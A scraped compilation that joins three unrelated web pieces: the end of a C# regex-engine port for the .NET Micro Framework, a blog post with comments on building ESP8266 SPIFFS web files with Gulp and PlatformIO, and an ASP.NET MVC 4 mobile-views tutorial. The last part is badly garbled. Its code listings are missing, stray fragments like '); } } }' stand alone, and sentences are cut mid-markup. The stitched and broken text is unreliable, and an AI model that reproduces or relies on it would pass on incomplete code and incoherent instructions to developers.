Views\Shared\_Layout.cshtml file. <h1> Non Mobile Layout MVC4 Conference </h1> Browse to the AllTags page in a desktop browser. 
The view-switcher widget is not displayed in a desktop browser because it's added only to the mobile layout page. Later in the tutorial you'll see how you can add the view-switcher widget to the desktop view. Improving the Speakers List In the mobile browser, select the Speakers link. Because there's no mobile view(AllSpeakers.Mobile.cshtml), the default speakers display (AllSpeakers.cshtml) is rendered using the mobile layout view (_Layout.Mobile.cshtml).. (That is,. You can disable consistent display mode in a; } Creating a Mobile Speakers View As you just saw, the Speakers view is readable, but the links are small and are difficult to tap on a mobile device. In this section, you'll create a mobile-specific Speakers view that looks like a modern mobile application — it displays large, easy-to-tap links and contains a search box to quickly find speakers. Copy AllSpeakers.cshtml to AllSpeakers.Mobile.cshtml. Open the AllSpeakers.Mobile.cshtml file and remove the <h2> heading element. In the <ul> tag, add the data-role attribute and set its value to listview. Like other data-* attributes, data-role="listview" makes the large list items easier to tap. This is what the completed markup looks like: @model IEnumerable<string> @{ ViewBag. @foreach(var speaker in Model) { <li>@Html.ActionLink(speaker, "SessionsBySpeaker", new { speaker })</li> } </ul> Refresh the mobile browser. The updated view looks like this: Although the mobile view has improved, it's difficult to navigate the long list of speakers. To fix this, in the <ul> tag, add the data-filter attribute and set it to true. The code below shows the ul markup. <ul data- The following image shows the search filter box at the top of the page that results from the data-filter attribute. As you type each letter in the search box, jQuery Mobile filters the displayed list as shown in the image below. 
Improving the Tags List

Like the default Speakers view, the Tags view is readable, but the links are small and difficult to tap on a mobile device. In this section, you'll fix the Tags view the same way you fixed the Speakers view. Remove the ".hide" suffix from the Views\Home\AllTags.Mobile.cshtml.hide file so the name is Views\Home\AllTags.Mobile.cshtml. Open the renamed file and remove the <h2> element. Add the data-role and data-filter attributes to the <ul> tag, as shown here: <ul data-role="listview" data-filter="true"> The image below shows the tags page filtering on the letter J.

Improving the Dates List

You can improve the Dates view like you improved the Speakers and Tags views, so that it's easier to use on a mobile device. Copy the Views\Home\AllDates.cshtml file to Views\Home\AllDates.Mobile.cshtml. Open the new file and remove the <h2> element. Add data-role="listview" to the <ul> tag, like this: <ul data-role="listview"> The image below shows what the Date page looks like with the data-role attribute in place. Replace the contents of the Views\Home\AllDates.Mobile.cshtml file with the following code: This code groups all sessions by days. It creates a list divider for each new day, and it lists all the sessions for each day under a divider. Here's what it looks like when this code runs:

Improving the SessionsTable View

In this section, you'll create a mobile-specific view of sessions. The changes we make will be more extensive than in other views we have created. In the mobile browser, tap the Speaker button, then enter Sc in the search box. Tap the Scott Hanselman link. As you can see, the display is difficult to read on a mobile browser. The date column is hard to read and the tags column is out of the view.
To fix this, copy Views\Home\SessionsTable.cshtml to Views\Home\SessionsTable.Mobile.cshtml, and then replace the contents of the file with the following code: @using MvcMobile.Models @model IEnumerable<Session> <ul data- @foreach(var session in Model) { <li> <a href="@Url.Action("SessionByCode", new { session.Code })"> <h3>@session.Title</h3> <p><strong>@string.Join(", ", session.Speakers)</strong></p> <p>@session.DateText</p> </a> </li> } </ul> The code removes the room and tags columns, and formats the title, speaker, and date vertically, so that all this information is readable on a mobile browser. The image below reflects the code changes. Improving the SessionByCode View Finally, you'll create a mobile-specific view of the SessionByCode view. In the mobile browser, tap the Speaker button, then enter Sc in the search box. Tap the Scott Hanselman link. Scott Hanselman's sessions are displayed. Choose the An Overview of the MS Web Stack of Love link. The default desktop view is fine, but you can improve it. Copy the Views\Home\SessionByCode.cshtml to Views\Home\SessionByCode.cshtml and replace the contents of the Views\Home\SessionByCode.Mobile.cshtml file with the following markup: @model MvcMobile.Models.Session @{ ViewBag. <li data-Speakers</li> @foreach (var speaker in Model.Speakers) { <li>@Html.ActionLink(speaker, "SessionsBySpeaker", new { speaker })</li> } </ul> <p>@Model.Description</p> <h4>Code: @Model.Code</h4> <ul data- <li data-Tags</li> @foreach (var tag in Model.Tags) { <li>@Html.ActionLink(tag, "SessionsByTag", new { tag })</li> } </ul> The new markup uses the data-role attribute to improve the layout of the view. Refresh the mobile browser. The following image reflects the code changes that you just made: Mobile site. - jQuery Mobile Overview - W3C Recommendation Mobile Web Application Best Practices - W3C Candidate Recommendation for media queries This article was originally created on August 15, 2012
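As a concrete illustration of the media-query technique discussed earlier in this tutorial, a stylesheet like Site.css typically pairs the viewport tag with a rule of this shape (a sketch; the selector and property values here are illustrative, not the tutorial's actual rules):

```css
/* Default (desktop) rule */
#menu li { display: inline; padding: 0 12px; }

/* Override for narrow (mobile) browsers, as with the 850-pixel
   max-width query the tutorial modifies and restores */
@media only screen and (max-width: 850px) {
    #menu li { display: block; padding: 8px 0; font-size: 1.2em; }
}
```

When the browser window is 850 pixels wide or narrower, the rules inside the media block win; otherwise the default rules apply.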
http://www.asp.net/mvc/overview/older-versions/aspnet-mvc-4-mobile-features
The annual NYU Polytechnic School of Engineering Cyber Security Awareness Week (CSAW) Capture The Flag (CTF) competition online qualifiers were held September 19-21, 2014. This is a writeup of one of the Exploitation challenges we solved: "saturn". The problem has this hint with an attached file. You have stolen the checking program for the CSAW Challenge-Response-Authentication-Protocol system. Unfortunately you forgot to grab the challenge-response keygen algorithm (libchallengeresponse.so). Can you still manage to bypass the secure system and read the flag? nc 54.85.89.65 8888 We start off with a typical examination of the file: [root@localhost saturn]# file saturn saturn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xa55828fef5637b04d127681ada4a06b332d54a9c, stripped The CTF hint gave us the tip to look for which shared objects the binary is linked with. [root@localhost saturn]# ldd saturn linux-gate.so.1 => (0xb77f8000) libchallengeresponse.so => not found libc.so.6 => /lib/libc.so.6 (0x48ad5000) /lib/ld-linux.so.2 (0x48ab2000) So we can’t even run saturn yet because we didn’t steal the “challenge-response keygen algorithm.” We look at the imports of saturn and notice that fillChallengeResponse is among them. So we create a .c file containing a prototype for that function that will be exported. For now, ignore the contents of the function… that comes later. 
#include <stdio.h> #include <stdlib.h> #include <string.h> void hexdump(unsigned char * arr){ int i; for(i=0;i<16;i++){ printf("%x ", arr[i]); } } unsigned char * challenge = "0123456789abcdef0123456789ABCDEF"; unsigned char * response = "ZXCVBNMKJHGFDSAPzxcvbnmkjhgfdsap"; void fillChallengeResponse(int a, int b, int c, int d, int e, int f){ printf("Inside fillChallengeResponse\n"); printf("Got 0x%x, 0x%x, 0x%x, 0x%x, 0x%x, 0x%x\n", a, b, c, d, e, f); memcpy((void *)a, (void*)challenge, 32); memcpy((void *)b, (void*)response, 32); } libchallengeresponse.c Compile it into a .so. [root@localhost saturn]# gcc -shared libchallengeresponse.c -o libchallengeresponse.so Assuming that both saturn and your new .so are in the same directory, you can simply add the current directory to your library path. [root@localhost saturn]# export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:. Now you can run saturn, and since we have exported the environment variable, you can run it inside gdb and it will pick up your .so. At this point you can combine dynamic and static analysis as well as some guess work. I arrived at the answer mostly through static analysis, although ddd contributed as well. You can run the program listening on the network with a command like [root@localhost saturn]# nc -l 8888 -e saturn -x ncout.txt Opening saturn in your favorite disassembler (say, IDA Pro), we look for the use of the fillChallengeResponse function we created earlier. In that area of the program, we find this main code loop: I labeled some of the functions in blue based on analyzing the disassembly. The key is to look for known imports ( fread, read, write, etc.) of library functions and examine their arguments. 
We see here by following the logic from top to bottom that if the first four bits of the byte the program reads from stdin is 0xA, it goes to “ print_4_bytes_of_buf“; if it’s 0xE, it goes to “ save_response“; and if it’s 0x8, it goes to “ check_resp_and_print_flag.” You know it’s the flag function because of the obvious fread of “ flag.txt” in that function’s machine code. At this point, we have uncovered most of the algorithm the server uses. The last piece of the puzzle is to recognize that the two arguments to the fillChallengeResponse function in libchallengeresponse.so are next to each other in the binary’s .data section ( 0x804A0C0 and 0x804A0E0). They are both 32 bytes. The key is that the four least significant bits of the 0xA0 code is used to index into that memory. Since it reads four bytes at a time, we can actually read 64 bytes of memory using the range 0xA0-0xAF, not just 32 bytes! So we write a quick and dirty Python script to send the bytes to the server, read past the challenge into the response, send the response back, and then ask for the contents of flag.txt. #!/usr/bin/env python import sys, socket, struct def get_response(s): """Get a response from the socket.""" response = s.recv(1024) print "The challenge server says: ", response print "\tBytes: %s" % hex_dump(response) return response def hex_dump(arr): """Pretty print""" return ":".join("{:02x}".format(ord(c)) for c in arr) #Arguments: <IP of challenge server> <port> if __name__ == "__main__": s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], int(sys.argv[2]))) #Get the banner message get_response(s) print "Sending bytes" challenge = "" #Send increasing values from 0xa0. The 4 LSBits of this code # are used as an index into the array. Each aX value sent # to the challenge server retrieves 4 bytes #Note that 0x10*4 > 0x20, so we're going to retrieve bytes # from outside the challenge buffer in memory. 
for i in range(0x10): val = 0xa0 + i s.send(struct.pack("<B", val)) #Get 4 bytes of memory from the server response = get_response(s) for c in response: challenge += c print "Complete response: ", hex_dump(challenge) #We overran the buffer so the last half of the array is # the expected response myresponse = challenge[32:] print "Sending back challenge: ", hex_dump(myresponse) #Send a series of values increasing from 0xe0 followed by # 4 bytes of the expected response. The server doesn't # respond in between our sends. #8*4 = 32 bit response for i in range(8): val = 0xe0 + i s.send(struct.pack("<B", val)) ri = i*4 s.send(struct.pack("<BBBB", ord(myresponse[ri]), ord(myresponse[ri+1]), ord(myresponse[ri+2]), ord(myresponse[ri+3]))) print "Sent challenge" #Now that we've sent the correct response back to the server, we # send the final magic code to trigger the check and cause the server # to print the contents of flag.txt print "Sending final code..." s.send(struct.pack("<B", 0x80)) get_response(s) print "Exiting..." 
saturn.py And here is the output from the CSAW server: [root@localhost saturn]# python saturn.py 54.85.89.65 8888 The challenge server says: CSAW ChallengeResponseAuthenticationProtocol Flag Storage Bytes: 43:53:41:57:20:43:68:61:6c:6c:65:6e:67:65:52:65:73:70:6f:6e:73:65:41:75:74:68:65:6e:74:69:63:61:74:69:6f:6e:50:72:6f:74:6f:63:6f:6c:20:46:6c:61:67:20:53:74:6f:72:61:67:65:0a Sending bytes The challenge server says: x��@ Bytes: 78:ea:cd:40 The challenge server says: �<\ Bytes: dd:3c:01:5c The challenge server says: Eȣ( Bytes: 45:c8:a3:28 The challenge server says: ���H Bytes: a1:eb:d9:48 The challenge server says: �I�P Bytes: e3:49:d8:50 The challenge server says: J�Xv Bytes: 4a:82:58:76 The challenge server says: '��1 Bytes: 27:c0:fd:31 The challenge server says: ���( Bytes: de:f8:f0:28 The challenge server says: �h1 Bytes: f9:68:10:31 The challenge server says: ��y% Bytes: 81:9f:79:25 The challenge server says: ٧|# Bytes: d9:a7:7c:23 The challenge server says: jl~ Bytes: 03:6a:6c:7e The challenge server says: ���S Bytes: 9e:b8:e7:53 The challenge server says: ��S Bytes: a4:c3:53:20 The challenge server says: o=+ Bytes: 00:6f:3d:2b The challenge server says: `�� Bytes: 60:9f:bb:00 Complete response: 78:ea:cd:40:dd:3c:01:5c:45:c8:a3:28:a1:eb:d9:48:e3:49:d8:50:4a:82:58:76:27:c0:fd:31:de:f8:f0:28 Sending back challenge: Sent challenge Sending final code... The challenge server says: flag{greetings_to_pure_digital} Bytes: 66:6c:61:67:7b:67:72:65:65:74:69:6e:67:73:5f:74:6f:5f:70:75:72:65:5f:64:69:67:69:74:61:6c:7d:0a Exiting... Flag: greetings_to_pure_digital
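A quick sanity check of the overread arithmetic used above: sixteen 0xA0-codes at four bytes each cover 64 bytes, i.e. both the 32-byte challenge and the 32-byte response that sit next to each other in .data (a standalone sketch, not part of saturn.py):

```python
import struct

WORD_SIZE = 4        # each 0xAX code returns 4 bytes of memory
CHALLENGE_LEN = 32   # buffer at 0x804A0C0
RESPONSE_LEN = 32    # buffer at 0x804A0E0, immediately after it

def read_codes():
    """The byte sequence the exploit sends: 0xa0 through 0xaf."""
    return b"".join(struct.pack("<B", 0xA0 + i) for i in range(0x10))

def bytes_covered(codes):
    """Total memory returned by the server for these read codes."""
    return len(codes) * WORD_SIZE
```

This is why indexes 0xa8 onward spill past the challenge buffer into the expected response.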
https://www.digitaloperatives.com/2014/09/22/csaw-ctf-2014-qualification-round-write-up-exploitation-400-saturn/
hello, i am working on a tempconverter program, i have tried a number of things to get this program to work and everytime i try something it seems to either mess something else up, or only do half of what i need it to do. could anyone give me some hints or insight as to what i am doing wrong? thanks Code: double fTOc(double); //Fahrenheit to Celsius double cTOf(double); //Celsius to Fahrenheit int main() { double temp;//temperature entered char scale[1];//identify scale used (C or F) double absZeroC = -273.15;//variable to easier identify absolute zero in Celsius double absZeroF = -459.67;//variable to easier identify absolute zero in Fahrenheit printf("Enter the temperature followed by F or C( Ex: \"75 F\"):"); scanf("%lf%s", &temp, scale); if (scale == "C") if (temp > absZeroC) printf("\nTemperature in Fahrenheit is %f.\n", cTOf(temp)); else if ( temp < absZeroC) printf("\nTemperature %f is less than absolute zero %f", temp, absZeroC); if (scale == "F") if (temp > absZeroF) printf("\nTemperature in Celsius is %f.\n", fTOc(temp)); else if (temp < absZeroF) printf("\nTemperature %f is less than absolute zero %f", temp, absZeroF); else printf("\nInvalid scale entry! Use C for Celsius or F for Fahrenheit!\n\n"); system("pause"); return 0; } double fTOc(double f)//fah to celsius { return (5.0 / 9.0) * (f - 32); } double cTOf(double c)//celsius to fah { return ((9.0 / 5.0) * c) + 32; }
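For what it's worth, the main problems in the snippet above are string handling: scale == "C" compares pointers, not contents (use strcmp), and char scale[1] has no room for the terminating '\0' that scanf's %s writes. A hedged sketch of the fixed pieces (the helper names are mine, not from the original program):

```c
#include <stdlib.h>
#include <string.h>

/* scale needs room for the character AND the terminating '\0', so it
   should be declared as: char scale[2];  and read with scanf("%1s", scale); */

/* C strings are compared with strcmp(), which returns 0 on a match --
   writing scale == "C" only compares memory addresses. */
int is_celsius(const char *scale) {
    return strcmp(scale, "C") == 0;
}

/* Bonus: the same pattern also cleans up the chained if statements,
   since each branch can call is_celsius()/strcmp() instead of ==. */
int is_fahrenheit(const char *scale) {
    return strcmp(scale, "F") == 0;
}
```

With that change, the "Invalid scale entry" branch also needs braces around the Fahrenheit if/else chain so the final else binds to the scale check rather than the temperature check.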
http://cboard.cprogramming.com/c-programming/112968-help-temp-converter-printable-thread.html
class Solution(object):
    def minArea(self, image, x, y):
        """
        :type image: List[List[str]]
        :type x: int
        :type y: int
        :rtype: int
        """
        top, left = float("inf"), float("inf")
        bot, right = -1, -1
        image[x][y] = None
        q = collections.deque([(x, y)])
        while q:
            x, y = q.pop()
            top, left = min(x, top), min(y, left)
            bot, right = max(x, bot), max(y, right)
            for x0, y0 in (x-1, y), (x+1, y), (x, y-1), (x, y+1):
                if 0 <= x0 < len(image) and 0 <= y0 < len(image[0]) and image[x0][y0] == "1":
                    image[x0][y0] = None
                    q.appendleft((x0, y0))
        return (right - left + 1) * (bot - top + 1)

Many people will have the question: why do we need x and y here? The reason is that instead of O(mn) time, where the image can be very big, we only need O(numberOfBlackPixels) time if we have x, y. We do BFS and find the topLeft corner and botRight corner of this rectangle: top is the smallest x value ever observed in BFS, left is the smallest y value, and similarly for bot and right. Then we get our rectangle after one BFS, wow, is this amazing :)
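To see the corner-tracking at work, here is a self-contained restatement of the same BFS as a plain function, working on a copy of the grid so it can be run directly:

```python
import collections

def min_area(image, x, y):
    """Bounding-rectangle area of the black region containing (x, y).

    Same algorithm as the Solution class above: BFS only over black
    pixels, tracking the extreme row/column indices seen so far.
    """
    top = left = float("inf")
    bot = right = -1
    image = [list(row) for row in image]  # mutable copy; "1" -> visited None
    image[x][y] = None
    q = collections.deque([(x, y)])
    while q:
        x, y = q.pop()
        top, left = min(x, top), min(y, left)
        bot, right = max(x, bot), max(y, right)
        for x0, y0 in ((x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)):
            if 0 <= x0 < len(image) and 0 <= y0 < len(image[0]) and image[x0][y0] == "1":
                image[x0][y0] = None
                q.appendleft((x0, y0))
    return (right - left + 1) * (bot - top + 1)
```

For a grid with black pixels at (0,2), (1,1), (1,2), (2,1), the rectangle spans rows 0-2 and columns 1-2, so the area is 6.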
https://discuss.leetcode.com/user/younghuman
Hi the first question is, how can I set a min and max for the rand function. At the moment i'm seeding from ctime then using It picks a number between 0 and 100 then if its too high it sets the max integer to the number just guessed. How can I change the min one.It picks a number between 0 and 100 then if its too high it sets the max integer to the number just guessed. How can I change the min one.Code:int theNumber = rand() % max + 1 My second question is: How can I make it so it adds to my shopListCount when the vector gets pushed back.How can I make it so it adds to my shopListCount when the vector gets pushed back.Code:#include <iostream> #include <string> #include <vector> using namespace std; int main() { string input; const int MAX_ITEMS = 10; int inventoryCount = 0; string inventory[MAX_ITEMS]; vector<string> shopList; int shopListCount = 0; shopList.push_back("Sword") && (shopListCount++); shopList.push_back("Shield" && (shopListCount++); shopList.push_back("Firewood") && (shopListCount++); cout << "Welcome to Ben's Test RPG, input inventory if you want to see what you own, type quit to leave aand type shop to see the shop" << endl; do { cin >> input; if(input == "inventory") if(inventoryCount != 0) for (int i=0; i < inventoryCount; i++) cout << inventory[i]; else cout << "Sorry you have no items." << endl; if(input == "shop") for (int j=0; j < shopListCount; j++) cout << shopList[j]; if(input == "quit") ; else cout << "Sorry incorrect choice."; }while(input != "quit") } Thanks, Ben
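On both questions, a minimal sketch (the helper names are mine, not from the original program): a value in [minVal, maxVal] comes from taking the remainder over the range width and shifting it up by the minimum, and the manual shopListCount can simply be dropped in favour of the vector's own size():

```cpp
#include <cstdlib>
#include <string>
#include <vector>

// rand() restricted to [minVal, maxVal] inclusive: remainder over the
// width of the range, then offset by the lower bound.
int randBetween(int minVal, int maxVal) {
    return minVal + std::rand() % (maxVal - minVal + 1);
}

// The vector already tracks how many items it holds, so no parallel
// counter is needed; loops can use shopList.size() directly.
std::size_t addItem(std::vector<std::string>& shopList, const std::string& item) {
    shopList.push_back(item);
    return shopList.size();
}
```

For the guessing game, after a too-high guess you set max to the guess; after a too-low guess, set min to the guess and keep drawing with randBetween(min, max).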
https://cboard.cprogramming.com/cplusplus-programming/93023-few-questions.html
msgrcv - XSI message receive operation [XSI]

SYNOPSIS

#include <sys/msg.h>

ssize_t msgrcv(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg);

DESCRIPTION

The msgrcv() function operates on XSI message queues (see XBD Message Queue). Upon successful completion, the following actions are taken with respect to the data structure associated with msqid:

- msg_qnum shall be decremented by 1.
- msg_lrpid shall be set to the process ID of the calling process.
- msg_rtime shall be set to the current time, as described in IPC General Description.

RETURN VALUE

Upon successful completion, msgrcv() shall return a value equal to the number of bytes actually placed into the buffer mtext. Otherwise, no message shall be received, msgrcv() shall return -1, and errno shall be set to indicate the error.

SEE ALSO

XSI Interprocess Communication, msgsnd, sigaction, XBD Message Queue, <sys/msg.h>

CHANGE HISTORY

First released in Issue 2. Derived from Issue 2 of the SVID. The type of the return value is changed from int to ssize_t, and a warning is added to the DESCRIPTION about values of msgsz larger than {SSIZE_MAX}. The note about use of POSIX Realtime Extension IPC routines has been moved from FUTURE DIRECTIONS to the APPLICATION USAGE section. The normative text is updated to avoid use of the term "must" for application requirements. POSIX.1-2008, Technical Corrigendum 1, XSH/TC1-2008/0398 [345] and XSH/TC1-2008/0399 [421] are applied.
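A minimal usage sketch (not part of the specification text above): create a private queue, send one message with msgsnd(), and receive it back with msgrcv(). The helper name and buffer sizes are illustrative; the queue is removed in all paths so no kernel object leaks.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>

struct msgbuf { long mtype; char mtext[64]; };

/* Round-trip one message through a private XSI queue.
 * Returns the byte count msgrcv() placed in mtext, or -1 on failure. */
long roundtrip(const char *text) {
    int msqid = msgget(IPC_PRIVATE, 0600);
    if (msqid == -1) return -1;

    struct msgbuf out;
    memset(&out, 0, sizeof out);
    out.mtype = 1;                              /* the msgtyp we ask for below */
    strncpy(out.mtext, text, sizeof out.mtext - 1);

    long n = -1;
    if (msgsnd(msqid, &out, strlen(out.mtext) + 1, 0) == 0) {
        struct msgbuf in;
        memset(&in, 0, sizeof in);
        n = msgrcv(msqid, &in, sizeof in.mtext, 1 /* msgtyp */, 0);
    }
    msgctl(msqid, IPC_RMID, 0);                 /* always remove the queue */
    return n;
}
```

msgrcv() returns the number of bytes placed in mtext, so sending "hello" plus its terminating '\0' yields a return value of 6.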
https://pubs.opengroup.org/onlinepubs/9699919799/functions/msgrcv.html
CC-MAIN-2019-47
refinedweb
214
57.16
"default property alias content" under QML Designer

- sraboisson
Hello everybody,

I saw a strange behavior under QML Designer when using "default property alias content". I tried to locate an existing issue about this point, but without success, and I'd like to have your feedback on whether I'm doing it right.

I'm using "default property alias content" in a QML file (see the following example that reproduces the problem). Note: it's working correctly under QMLViewer => no error.

Panel.qml:
@import QtQuick 1.0
Rectangle {
    id: aPanel
    width: 100
    height: 100
    radius: 5
    color: "darkGray"
    default property alias content: aPanelCenter.children
    Rectangle {
        id: aPanelCenter
        clip: true
        color: "darkBlue"
        anchors.fill: parent
        anchors.topMargin: 6
        anchors.bottomMargin: 6
        anchors.leftMargin: 6
        anchors.rightMargin: 6
    }
}@

MainComponent.qml:
@import QtQuick 1.0
import "UI"
Rectangle {
    width: 300
    height: 300
    color: "black"
    Panel {
        id: mainPanel
        x: 50
        y: 50
        Rectangle {
            id: aRectangle
            x: 36
            y: 63
            width: 300
            height: 50
            color: "Green"
        }
    }
}@

The point is that I don't have the same rendering under QML Designer and QML Viewer: the "default property alias content" seems to be ignored under QML Designer. The object "aRectangle" should be created as a child of "aPanelCenter", and clipped by it, am I wrong? But it's only the case under QML Viewer, and in the state preview on top of QML Designer, NOT in the central view of QML Designer!

Do I do something wrong with this "default property alias content", is it a known limitation, or a bug of QML Designer? Hope someone could help... ;)

- ThomasHartmann
This is a bug/missing feature in the Qt Quick Designer. We handle these cases (the margins of aPanelCenter should be reflected), but we do not handle the different clipping setting. Since the clipping is done by the form editor itself and the state previews are rendered differently, the bug only appears in the form editor.
https://forum.qt.io/topic/15825/default-property-alias-content-under-qml-designer
CC-MAIN-2018-30
refinedweb
315
57.37
Obtain all IP addresses of local machine

Environment: Compiled on Visual Studio .NET & Windows XP Pro. Code works on any Windows machine.

You're obviously writing TCP/IP applications. You have the ability to create sockets and bind them to specific ports. You may bind to all the ports, you may bind to 127.0.0.1, or finally you may want to bind to specific IP addresses of your local machine. Attached is the code required to simply start up winsock in a Windows environment, and enumerate all the IP addresses on your local machine. It is a console application, no MFC, not much Windows specific code. It has been tested in a Windows XP Professional environment, along with a Windows 2000 Server environment. We enumerate all the IPs until the list terminates (with a NULL pointer). It should have no problems working with Windows 95/98/Me/2k/XP/CE. I also tested it in our server environment where we have 32 IP addresses and we have software listening on the same port on different IPs, all located on the one NIC card that has access to the internet. In fact we are hosting listening servers on port 80 alongside IIS. This requires you to disable socket pooling, but that is another story. If you have any questions, don't hesitate to e-mail me.
#include <stdio.h>
#include <WinSock.h>

#pragma comment(lib, "wsock32.lib")

int main(int argc, char *argv[])
{
    WORD wVersionRequested;
    WSADATA wsaData;
    char name[255];
    PHOSTENT hostinfo;
    wVersionRequested = MAKEWORD( 1, 1 );
    char *ip;

    if ( WSAStartup( wVersionRequested, &wsaData ) == 0 )
    {
        if( gethostname ( name, sizeof(name)) == 0)
        {
            printf("Host name: %s\n", name);
            if((hostinfo = gethostbyname(name)) != NULL)
            {
                int nCount = 0;
                while(hostinfo->h_addr_list[nCount])
                {
                    ip = inet_ntoa(*( struct in_addr *)hostinfo->h_addr_list[nCount]);
                    printf("IP #%d: %s\n", ++nCount, ip);
                }
            }
        }
    }
    return 0;
}

Downloads
Download demo project - 28.0 Kb
Download source - 28.0 Kb

Linux - Version? Posted by Urlaub in Ungarn on 11/03/2012 12:29pm
Hi, is there a version running on Linux available?

question regarding modification to above code. Posted by Legacy on 12/16/2003 12:00am. Originally posted by: Avi

GetIpAddress. Posted by Legacy on 05/18/2003 12:00am. Originally posted by: tom cruz

Works with Windows XP and 2000. Posted by Legacy on 07/19/2002 12:00am. Originally posted by: Vikram Jairam
It enumerates all the active IP Addresses on your computer just as the author promises. Really useful if you want to write a daemon that manages port-IP combinations on the same machine. Helped a lot. Thanks Khaled

Doesn't Work On W2K SERVER.... Posted by Legacy on 06/03/2002 12:00am. Originally posted by: Phan Tien Vu

Doesn't Quite Work In W2K or XP. Posted by Legacy on 05/06/2002 12:00am. Originally posted by: Shaun Staley
It works ok when the computer is connected to the network. However, as soon as you unplug the cable from the network, XP & 2000 says the cable is unplugged. When that happens, it gives you an IP address of 127.0.0.1. Is there any fix for this? Thanks

MAC. Posted by Legacy on 03/26/2002 12:00am. Originally posted by: Jeff
How can you get the MAC address for each IP?

Not C#. Posted by Legacy on 03/25/2002 12:00am. Originally posted by: Khalid Shaikh
Small problem guys, This isn't C#. :( It is C++. I can look into C# if everyone is so excited about it.
11:02AM PST, Monday March 25: Okay guys, I just wrote up the C# version. It is kind of cool having a side by side C++ implementation as well! :P Going to submit it.

Great. Posted by Legacy on 03/23/2002 12:00am. Originally posted by: barry
ya! that was really great & good.
http://www.codeguru.com/csharp/csharp/cs_network/article.php/c6045/Obtain-all-IP-addresses-of-local-machine.htm
CC-MAIN-2014-41
refinedweb
637
65.62
Hi all again, I'm now in my 3rd week of my C++ course and I have a few little issues I need explained to me. The Hangman game in question is NOT supposed to be functional yet. It's a generic exercise in classes, in which Hangman will be MY final project come the 9th week. So, I'm getting an early start. Note: it compiles without errors but it's just missing certain 'cout' streams.

Questions and Concerns
1. Why doesn't my 'char Menu::getSelection()' from my menu.cpp display the cout stream? That's all I need it to do, for now.
2. Unsure if my 'showHiScore()' (which I hard-coded for display purposes only) is written correctly. I don't even get the cout stream. Any advice on this will be greatly appreciated.
3. This one is just a nuisance, really: When the console program runs, I get "class Menu - Inside of 'Menu' default constructor" displayed twice. Why does it appear twice when the Menu constructor is defined only once within menu.cpp?

Please take a look at my code:

Menu.h
#ifndef Menu_h
#define Menu_h

#include <iostream>
using namespace std;

class Menu
{
public:
    Menu();                    // Default Constructor
    void showTitle();          // Displays name of game
    void showMenu();           // Displays menu
    void showSelection();      // Shows user the selections such as New Game and Load Game
    char getSelection() const; // Get user selection (accessor - getter)
    void setSelection(char);   // Sets user selection (mutator - setter)
    char sel;                  // variable to hold user selection
};

#endif //Menu_h

Menu.cpp
#include "Menu.h"
#include <iostream>
using namespace std;

Menu::Menu()
{
    cout << "class Menu - Inside of 'Menu' default constructor\n" << endl;
}

void Menu::showTitle()
{
    cout << "\n\nclass Menu showTitle() H-A-N-G-M-A-N" << endl;
}

void Menu::showMenu()
{
    //showMenu() definition
}

void Menu::showSelection()
{
    cout << "\n\nclass Menu showSelection() - Please enter your selection: " << endl;
    cout << "A." << endl;
    cout << "B." << endl;
    cout << "C." << endl;
    //showSelection() definition
}

char Menu::getSelection() const
{
    cout << "\nclass Menu - getSelection() will return the user's selection";
    return sel;
    //getSelection() definition
}

void Menu::setSelection(char sel)
{
    char selection = sel; // Stores user's selection in 'sel' variable.
                          // Declares 'selection' as stored variable 'sel'
}

Derive.h
#ifndef Derived_h
#define Derived_h

#include "Menu.h"
#include <iostream>
#include <string>
using namespace std;

class Derived : public Menu
{
public:
    Derived();       // Default constructor
    void showMenu(); // Overrides showMenu() from base class 'Menu'
    int showHiScore(int num);
};

#endif

Derived.cpp
#include "Menu.h"
#include "Derived.h"
#include <iostream>
using namespace std;

Derived::Derived()
{
    cout << "class Derived - Inside the 'Derived' constructor" << endl;
}

void Derived::showMenu()
{
    cout << "\n\n\t\tCLASS DERIVED (overridden)Menu: showMenu()" << endl;
    cout << "\t\t******************************************" << endl;
    cout << "\n<---- Menu under construction at this time---->" << endl;
    //showMenu() overridden 'base class' definition
}

int Derived::showHiScore(int num)
{
    cout << "\nInside the Class Derived showHiScore()" << endl;
    int HiScore = 1000;
    return HiScore;
}

Main.cpp
#include "Menu.h"
#include "Derived.h"
#include <iostream>
#include <string>
using namespace std;

int main()
{
    Menu class1;    // Constructor - creates 'class Menu' object
    Derived class2; // Constructor - creates 'class Derived' object

    class1.showTitle();
    class2.showMenu();        // Displays overridden menu
    class1.showSelection();   // Show user selection from class Menu
    class1.getSelection();    // Retrieves user selection

    char sel;                 // Declares 'sel' variable
    cin >> sel;               // Stores user selection in 'sel'
    class1.setSelection(sel); // Sets user selection from stored variable in 'sel'
    class2.showHiScore(1000); // class Derived - puts HiScore listed as 1000 for the purposes of this exercise
    return 0;
}
https://www.daniweb.com/programming/software-development/threads/289363/fake-hiscore-confusion-in-hangman
CC-MAIN-2018-13
refinedweb
557
57.06
The problem with strings decoding (Python)

There is a server written in C++ by another developer using ICE 3.7. I do not have the source code of the server, therefore it is impossible to change anything in the server code. I am writing a client program in Python. My program gets data from the server for further work. I get data using the Ice interface in string format. This is where I have a problem. The server does not write data for the client using UTF-8, but uses Windows-1251. Because characters of the national alphabet are present in the received data, an exception occurs when decoding in the Python client program ('utf-8' codec can't decode byte 0xd1 in position 3: invalid continuation byte).

Here is the code of the functions automatically generated in the Python module using slice2py:

def moduleInfo(self, type, uid, context=None):
    return _M_Server.Server._op_moduleInfo.invoke(self, ((type, uid), context))

Server._op_moduleInfo = IcePy.Operation('moduleInfo', Ice.OperationMode.Normal, Ice.OperationMode.Normal, False, None, (), (((), _M_Server._t_ModuleType, False, 0), ((), IcePy._t_int, False, 0)), (), ((), IcePy._t_string, False, 0), ())

Is it possible to somehow specify the encoding in which the server sends data, in the client function? Thanks for your answers.

Answers

Hi Igor,
The client cannot specify the server encoding for strings, you will have to install a string converter plug-in to convert a string from and to Windows-1251 encoding. see:
The plug-ins are C++ but will work with the Python mapping as it is built on top of the C++ runtime.
Cheers,
Jose

